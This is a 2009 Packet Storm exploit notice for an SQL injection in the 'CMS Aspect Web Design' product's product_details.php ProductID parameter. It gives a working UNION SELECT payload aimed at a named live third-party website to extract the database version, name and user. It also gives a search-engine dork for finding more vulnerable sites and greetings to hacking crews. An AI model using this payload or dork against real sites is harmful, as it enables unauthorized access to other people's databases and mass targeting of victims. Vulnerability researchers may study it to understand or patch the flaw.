CMS Aspect Web Design SQL Injection

2009-08-23T00:00:00
ID PACKETSTORM:80537
Type packetstorm
Reporter R3VAN_BASTARD
Modified 2009-08-23T00:00:00

Description

                                        
                                            `#*************************************************************************************************************************#  
#Title : CMS Aspect Web Design [SQL INJECTION]  
#*************************************************************************************************************************#  
#Software : http://www.aspect.co.im/  
#Date : 08/24/2009  
#Author : R3VAN_BASTARD  
#Contact : r3van[at]sux0r.net  
#Blog : http://sux0r.net  
#*************************************************************************************************************************#  
#[o]Vulnerable file  
#/product_details.php?ProductID=   
#Note:"sometime location for the Vulnerability not same"  
#*************************************************************************************************************************#  
#[o] Exploit  
#http://localhost/product_details.php?ProductID=[SQLi]  
#*************************************************************************************************************************#  
#[o]Demo:  
#http://www.bestangle.co.uk/product_details.php?ProductID=-17+union+select+1,2,version(),database(),user(),6,7,8,9,10,11--  
#*************************************************************************************************************************#  
#[o] Dork: intext:"Aspect Web Design"  
#***************************************************************#  
#[o] Greetz  
#My Love "Valencia"  
#www.MainHack.com - www.ServerIsDown.org - www.sux0r.net  
#VOP Crew [Vaksin13 * OoN_Boy * Paman]  
#S3TAN * Kecemplungkalen * eminem *  
#Yoga0400 * Pizzyroot * zny.Miciko *Madonk  
#Jupe Crew [makasih buat ngenet gratisnya sama tempat maboknya]  
#***************************************************************#`